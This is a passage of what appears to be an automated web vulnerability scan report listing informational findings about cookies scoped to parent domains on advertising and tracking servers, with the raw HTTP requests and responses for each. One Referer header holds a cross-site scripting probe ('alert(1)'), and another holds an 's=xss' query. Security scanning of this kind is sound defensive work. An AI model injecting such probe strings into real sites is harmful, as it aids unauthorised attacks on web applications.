Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

9.5. http://ad.agkn.com/iframe!t=1131!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

9.6. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=100842&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:02 GMT
Expires: Tue, 06 Sep 2011 11:59:03 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh19/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Wed, 05-Sep-2012 11:59:03 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Connection: close


9.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

9.8. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...

9.9. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: act=a$305#1315313312306_68316035_as3106_clk!1315313297486_68372787_as3103_imp!|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Set-Cookie: imp=a$le#1315313312306_68316035_as3106_clk|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Location: http://ad.doubleclick.net/clk;233814261;57705890;k
Content-Length: 0
Date: Tue, 06 Sep 2011 12:48:32 GMT


9.10. http://ak1.abmr.net/is/www.burstnet.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8117/3E06/&V=3-cwzEbZCyUni%2f8BpqAGOsC1A1e4rKZXfyTH1D5FeHizuf5PRgzsGOFg%3d%3d&I=F72DD362342178E&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: 01AI=2-2-CEA75E37E6AD97051B199F5C65B08B1FDBBAFC21037372201F06A86726AC8F7B-D1B963138697FBA3A5D965FE009043982D2E891BE605625CC233FC7124123F41

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8117/3E06/?01AD=3dkYMHVTzFhJCMGPi3NSiBcbGWNRR0UvEfUz4EkxlLyviMUraAANJXw&01RI=F72DD362342178E&01NA=
Expires: Tue, 06 Sep 2011 12:55:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close
Set-Cookie: 01AI=2-2-6E1EAF0179147B5D1D764362679C5E536EABA049D6323A5F5A0B520C95496E5D-C58C8B546BEE2EE1CDACBFEA5A790DA0813F5C3BFA7590E67B9304D8676098A0; expires=Wed, 05-Sep-2012 12:55:53 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


9.11. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&c3=9&c4=9844&c10=3186830&ns__t=1315331133850&ns_c=ISO-8859-1&c8=Click%20here%20to%20find%20out%20more!&c7=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&c9=http%3A%2F%2Fgames.frontier.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 12:45:33 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 12:45:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.12. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Set-Cookie: adxid=016e3b4e6615bdb5; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

9.13. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

9.14. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
